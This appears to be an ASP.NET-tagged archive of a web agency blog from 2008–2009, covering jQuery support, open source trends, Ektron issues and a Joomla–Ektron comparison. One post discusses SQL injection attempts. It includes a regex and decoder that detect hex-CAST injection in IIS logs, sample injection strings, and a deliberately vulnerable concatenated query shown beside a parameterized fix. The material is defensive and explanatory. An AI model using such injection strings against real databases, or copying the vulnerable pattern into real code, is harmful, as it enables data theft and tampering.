Posts Tagged ‘ASP.NET’

2009, the year of Open Source Software

January 7th, 2009

We are lucky to live in our times. No, it is not fun going through a (steep) economic downturn. But it is exciting to see the changes that such a recession will bring. One of the exciting changes that I predict for 2009 is a general boost to open source projects: increased usage and adoption by corporations while communities and ecosystems grow. Perhaps even to the point of competing with commercial products (in some cases). That is a question by itself: can an open source project compete with a commercial product?

This year, 2009, we will see how open source projects will make huge strides and erase the gap with commercial projects, if not gain an advantage over them. Here is why:

1. Unbeatable price: free! I know, it is not entirely true; you still need services around open source products, and arguably more than with commercial products. But as the market learns to adopt more and more open source products, the TCO can be lower with open source than with commercial products, especially if you have the right team on your side.

2. Gain from the ‘wisdom of the crowd’, instead of the wisdom of one as is often the case with commercial products. We see examples of this all over, in particular in the web development industry: Umbraco is gaining huge market share compared with Ektron. Magento Commerce is gaining huge market share over any other open source ecommerce platform and over some of the low and mid-level commercial products in the ecommerce industry. A similar thing is happening with ASP.NET: the framework is now adopting the MVC design pattern mostly because other platforms like Zend Framework and Ruby are free and produce amazing websites. Top it off with the adoption of jQuery in almost every commercial web product today, including the ASP.NET framework, which dumped AJAX.NET in favour of jQuery.

3. This is the sad-but-true part: developers are being laid off and hence join open source projects. It is known that the IT industry lags about 6 months behind the indicators; in other words, hi-tech layoffs will continue to come. In any case, more developers will be out of a job and will have plenty of time to collaborate and volunteer in open source projects – a great way to polish a resume…

To summarize, in 2009 we will see a great boost in open source adoption. Now, I am not saying that commercial products will not see any upside this year, but the competition will certainly be tougher than ever before. I am excited to see how it plays out. We certainly are going to focus our energies and our clients’ energies on the leaders of each industry. You?

Content Management Systems, eCommerce, Ektron, Magento, Web Development

A list of CMS and eCommerce systems that officially support jQuery

December 7th, 2008

Last updated: December 7th, 2008.

Recently, jQuery – the agile JavaScript Library – has reached a tipping point. Here is a list of CMS and eCommerce systems that our clients are most interested in and their status with regard to jQuery.

Systems where jQuery is officially supported:

1. Microsoft has adopted jQuery and will offer intellisense support in its dominant IDE: Visual Studio 2008.

2. Umbraco - an open source CMS. It now offers jQuery by default, and using jQuery in Umbraco is a matter of adding a simple call to include the jQuery files in the page.

3. Drupal - an open source CMS and framework. As of version 5 it offers jQuery straight from its core. There are plans to build a centralized jQuery plugin in Drupal version 7.

4. Typo3 - is an open source CMS Framework. Typo3 has a jQuery extension that allows advanced integration with jQuery.

5. DotNetNuke - an open source ASP.NET CMS. Since October 2008 DotNetNuke offers built in jQuery support beginning with version 5.

Systems where jQuery is not supported:

1. Joomla - seems to favor Mootools over jQuery. Here is an article on how to support jQuery within Joomla and avoid conflicts with other libraries.

2. Zend Framework – the leading PHP Framework following the MVC design pattern. A press release was issued in May 2008 announcing Zend Framework and Dojo partnership.

3. Magento Commerce – an open source eCommerce platform that is gaining huge market share in the eCommerce industry. Currently Magento Commerce supports the Prototype JS library instead of jQuery, but offers ways to integrate jQuery easily.

4. Zen-Cart - an open source eCommerce platform (competing with Magento). At the moment Zen-Cart does not support any JavaScript library in its core.

Other systems and their relationship to jQuery:

1. WordPress - open source blogging software. It uses jQuery for its core functionality, and jQuery is available to any third party plugin.

2. Ektron CMS400 – Ektron has an enterprise level CMS with advanced content editing features. Oddly enough, Ektron seems to have embedded their own version of jQuery in their code.

While jQuery seems to be the favored JavaScript library of many developers, it has yet to be declared the default one for many projects and systems. I’ll be keeping this list updated in the following months. Let me know if there is a system that interests you and I did not list it here.

Content Management Systems, eCommerce, Ektron, Joomla, Magento, Web Development, ZenCart

jQuery Emerges as Most Popular Javascript Library for Web Development

November 3rd, 2008

It seems to be official: jQuery is gaining ground faster than any other JavaScript Library. There may be many reasons but I like to think that jQuery is leading the pack due to its simplicity and relatively small size. Here is what Google Trends is showing us:

Top reasons jQuery is gaining ground:

  • Simplicity.
  • Small in size: only 15K for the latest production release after it is minified and gzipped.
  • Extendable: pretty big plugin library, currently showing hundreds of plugins.
  • CSS3 compliant and one of the first JS libraries to use CSS selectors.
  • Handles AJAX very well while avoiding code bloat.
  • Major adoption by ASP.NET developers, and teaming up with the ASP.NET team for improved integration.

jQuery Resources:

Other Javascript Libraries:

All these JavaScript frameworks provide the same basic idea: a single resource for cross-browser and cross-platform JavaScript development. Additionally, all of them make AJAX a little bit easier:

If you know of any additional interesting jQuery Resources, drop me a line. Thanks!

.NET Framework, AJAX, Web Design, Web Development, Web-based User Interfaces

Ektron CMS400 7.0 issues with .NET Framework 3.5 SP1

October 6th, 2008

After upgrading my development machine with Microsoft .NET Framework 3.5 SP1, I noticed a couple of things. First, the installer also updated the .NET Framework 2.0 instance to Service Pack 2.

Second, my instance of Ektron CMS400 v.7.0.4.20 (which runs under .NET Framework 2.0) started having problems. Specifically, I could no longer create library items in the workarea. Attempting to save a library item (for example, a hyperlink) would cause the page to post back and the icon bar to disappear:

The postback page after attempting to save the library item

There is no error message, but viewing the library item list reveals that the item was not saved.

The culprit was the page /workarea/library.aspx. Viewing the HTML source of this page when attempting to “Add Library”, the form tag’s action attribute was:

library.aspx

… no querystring parameters, so when the page posts back, Ektron can’t tell what it is supposed to save and the library item is silently lost.

Viewing the same page on a system without .NET Framework 3.5 SP1 results in an action attribute like this:

library.aspx?LangType=1033&action=AddLibraryItem&folder=98&type=images

Some background: As it turns out, the .NET Framework 3.5 SP1 installation changes the way the FORM tag’s ACTION attribute is handled. Prior to this upgrade, ASP.NET would ignore whatever you typed for the form’s action attribute in the markup. ASP.NET would instead render the action attribute to match the original page request. Starting with SP1, the action attribute is no longer ignored and will be rendered exactly as input.

Ektron, as it turns out, supplied an action attribute in the library.aspx form tag. Until the release of this Service Pack, it was ignored by ASP.NET.
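A small check for the regression described above, written as an added example (not code from the post or from Ektron): it parses a rendered page and reports which querystring parameters of the original request the form’s action attribute no longer carries, which is exactly what breaks the postback. The request URL and the two form tags are constructed from the action values shown above, not captured output.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs


class _FormActions(HTMLParser):
    """Collect the action attribute of every <form> in a rendered page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            # HTMLParser already unescapes &amp; inside attribute values
            self.actions.append(dict(attrs).get("action") or "")


def form_actions(html):
    parser = _FormActions()
    parser.feed(html)
    return parser.actions


def dropped_query_params(request_url, html):
    """Querystring keys of the request that the first form's action no longer carries.
    An empty list means the postback reaches the page with the same parameters."""
    wanted = parse_qs(urlsplit(request_url).query)
    actions = form_actions(html)
    carried = parse_qs(urlsplit(actions[0]).query) if actions else {}
    return sorted(key for key in wanted if key not in carried)


# Constructed samples of the two renderings described in the post
REQUEST_URL = ("http://cms.example/workarea/library.aspx"
               "?LangType=1033&action=AddLibraryItem&folder=98&type=images")
BEFORE_SP1 = ('<form name="form1" method="post" action="library.aspx'
              '?LangType=1033&amp;action=AddLibraryItem&amp;folder=98&amp;type=images"></form>')
AFTER_SP1 = '<form name="form1" method="post" action="library.aspx"></form>'

if __name__ == "__main__":
    print("before SP1, dropped:", dropped_query_params(REQUEST_URL, BEFORE_SP1))
    print("after SP1, dropped:", dropped_query_params(REQUEST_URL, AFTER_SP1))
```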

Two possible solutions:

This may not be an issue in Ektron CMS400 7.5+, but users of v7.0 should be wary, even if they’re not planning on upgrading to .NET Framework 3.5 SP1… Windows Update may upgrade you automatically around November of this year.

.NET Framework, Ektron, Web Development

Joomla vs Ektron

September 5th, 2008

We have been receiving a lot of comparison inquiries lately, and I wanted to put this simple Joomla vs Ektron content management system comparison table out there. Keep in mind that much of the decision about which CMS to choose for your company or organization is usually made well before this comparison, since the two systems differ at such a fundamental level. However, this is a comparison of those fundamentals plus some of the ‘interesting’ features.

Joomla vs Ektron

Feature/Item: License Model
  Joomla: Open Source
  Ektron: Closed Source, Compiled

Feature/Item: Price
  Joomla: Free
  Ektron: Starts at $15,000

Feature/Item: Web Platform
  Joomla: PHP
  Ektron: ASP.NET 2.0

Feature/Item: Database
  Joomla: MySQL
  Ektron: MS SQL (Express version OK)

Feature/Item: Extendability Options
  Joomla: Plugins, Components, Mambots. Joomla 1.5 went through significant development and now offers many hook-ups for plugins without hacking any core files.
  Ektron: Plugins (Observer Method), Ektron API (via ASP.NET code-behind), extensive Web Services API

Feature/Item: SEO Options
  Joomla: Search Engine Friendly URLs (Joomla 1.5); meta tag controls; full template overrides, clean HTML
  Ektron: Search Engine Friendly URLs (CMS400 7.6); meta tag controls and consolidation; content tagging; full template overrides, but the HTML is often not so clean (partly an issue with .NET as well)

Feature/Item: Social Networking
  Joomla: None, unless using a third party component or a plugin.
  Ektron: Many features built in: personal profile, personal area, connections between profiles, forums, blogging.

Thoughts?

Content Management Systems, Ektron, Joomla

Hack attempt: SQL Injection Targeting MS SQL Servers

August 19th, 2008

I noticed one of our client’s IIS web servers was getting a lot of SQL Injection attempts this past week. These attacks pass T-SQL code into querystring parameters in hopes that the application is not checking inputs.

Here’s the code: (I removed the SQL exec() statement and replaced it with print so you can see the unencoded SQL.)


This particular attack is well known and has been sighted in several variants:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
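As an added example (not code from the post), here is a defender-side check that scans IIS W3C log lines for the hex-encoded CAST signature of this attack and decodes the hex literal back to readable SQL for the incident record; it also handles the NVARCHAR (UTF-16) form of the same trick, which the post’s sample does not show. The log lines are constructed, the hex payload in them encodes only SELECT 1, and the field layout is taken from a standard #Fields header rather than assumed positions.

```python
import re
from urllib.parse import unquote_plus

# Signature of the attack described above: the T-SQL travels as a hex literal,
# is CAST back to text and executed, so plain keyword filters never see "UPDATE".
#   DECLARE @S VARCHAR(4000);SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S)
HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.IGNORECASE)


def decode_hex_sql(hexdigits):
    """Turn the hex literal back into readable SQL for the incident record."""
    raw = bytes.fromhex(hexdigits)
    # NVARCHAR variants carry UTF-16LE (every other byte NUL); VARCHAR ones are single-byte
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def inspect_query_string(qs):
    """Decoded SQL if the raw cs-uri-query carries the hex-CAST pattern, else None."""
    decoded = unquote_plus(unquote_plus(qs))  # these probes are often URL-encoded twice
    m = HEX_CAST.search(decoded)
    return decode_hex_sql(m.group(1)) if m else None


def scan_iis_log(lines):
    """Scan W3C extended log lines, locating columns from the #Fields header."""
    idx, hits = {}, []
    for line in lines:
        if line.startswith("#Fields:"):
            idx = {name: i for i, name in enumerate(line.split()[1:])}
            continue
        if line.startswith("#") or not line.strip() or not idx:
            continue
        f = line.split()
        sql = inspect_query_string(f[idx["cs-uri-query"]])
        if sql is not None:
            hits.append({"client": f[idx["c-ip"]], "stem": f[idx["cs-uri-stem"]], "sql": sql})
    return hits


# Constructed sample log; the hex payload encodes a harmless "SELECT 1",
# not the real attack string, so the decoder's output is obvious
SAMPLE_HEX = "SELECT 1".encode("latin-1").hex()
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status",
    "2008-08-19 10:00:00 10.0.0.5 GET /products.aspx id=42 80 192.0.2.10 200",
    "2008-08-19 10:00:01 10.0.0.5 GET /products.aspx id=42;DECLARE+@S+VARCHAR(4000);SET+@S="
    f"CAST(0x{SAMPLE_HEX}+AS+VARCHAR(4000));EXEC(@S);-- 80 192.0.2.77 200",
]
```

Running scan_iis_log(SAMPLE_LOG) returns one hit for 192.0.2.77 with the decoded SQL; the same function can be pointed at a real log file line by line.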

Using the following web application best practices, we avoid getting hacked:

  • Application level:
    • Never trust user input (e.g. querystring or form posts). Always consider that user input may contain exploit code and check it appropriately.
    • Always use Stored Procedures and/or Parameterized database queries. Don’t build SQL queries using string concatenation.
    • Use typed variables when possible. Converting a querystring parameter to an integer before passing it to a SQL query can inhibit some attacks.
  • Database level:
    • Use limited database permissions. For example, for SQL Server, don’t let your application run under the “sa” user. The database user should only have permissions in the particular database used by the application.
    • If possible, disable extended stored procedures such as xp_cmdshell.
    • Don’t use dynamic SQL. Dynamic SQL can be just as bad as building queries using string concatenation. Some DBAs have server-wide policies of no dynamic SQL.
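The application-level rules above, worked through in Python against an in-memory SQLite table as an added example (not the post’s own code; the post’s stack is ASP.NET and SQL Server, so the table, its rows and the handler names are constructed). The concatenated query is the pattern the post warns against, shown beside the typed-and-parameterized version.

```python
import sqlite3


def make_db():
    """Constructed in-memory catalogue standing in for the application's database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, unpublished INTEGER)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)",
                    [(1, "widget", 0), (2, "gadget", 0), (3, "prototype", 1)])
    return con


def lookup_concat(con, raw_id):
    """The pattern the post warns against: the querystring value is spliced into the SQL
    text, so an id of '1 OR 1=1 --' rewrites the WHERE clause and comments out the
    unpublished filter instead of selecting one product."""
    sql = "SELECT name FROM products WHERE id = " + raw_id + " AND unpublished = 0"
    return [row[0] for row in con.execute(sql)]


def lookup_parameterized(con, raw_id):
    """Typed variable first, parameterized query second: the driver sends the value
    separately from the statement text, so it can never be parsed as SQL."""
    product_id = int(raw_id)  # ValueError for anything that is not an integer
    rows = con.execute("SELECT name FROM products WHERE id = ? AND unpublished = 0",
                       (product_id,))
    return [row[0] for row in rows]


def handle_request(con, raw_id):
    """What the page handler should do: a non-integer id is a bad request, not a query."""
    try:
        return lookup_parameterized(con, raw_id)
    except ValueError:
        return None


if __name__ == "__main__":
    db = make_db()
    print("concatenated, id=1:          ", lookup_concat(db, "1"))
    print("concatenated, id=1 OR 1=1 --:", lookup_concat(db, "1 OR 1=1 --"))
    print("parameterized, id=1 OR 1=1 --:", handle_request(db, "1 OR 1=1 --"))
```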

The application level is crucial. Since a web application may someday be moved to a new server, we can’t assume that the web server and database have been configured using best practices.

All layers of security are important, though: If you’re using a third-party or closed-source web application, you may not have access to application code. In that case, the Database and Web Server layers are your last defense against exploits in improperly written code.

.NET Framework, Web Development

Ektron: Clarification on User Controls vs API

July 30th, 2008

We recently spotted an article on Bill Rogers’ blog (Ektron‘s CEO) which discusses usage of the Ektron Server Controls vs. Ektron’s API. At Activo, we constantly use both approaches; each is a bit different and is used in different situations. The article makes it much clearer that Ektron actually put more effort into the Server Controls than we had thought. Understanding that the Server Controls were made for this sort of usage makes us feel more secure using this method. Previously, I always thought of this method as a hack and preferred the API.

Frank heads our .NET development team and added the following:

I’ve found it easier to start off with a foundation of one of the server controls and build off of that, rather than using only API calls. The server control acts as a “datareader” which can be used to access the data initially. Many of the custom controls we built to replace XSLT use this model:

  • Add a ListSummary inside the user control/page and set its properties.
  • Access the ListSummary’s EkItems property.
  • Manipulate the data from EkItems, transform it, and output it into a repeater.

This tends to work more reliably than using the API calls. However, if the code needs to bypass the permissions model, the only option is to go direct using the API.

.NET Framework, Ektron, Web Development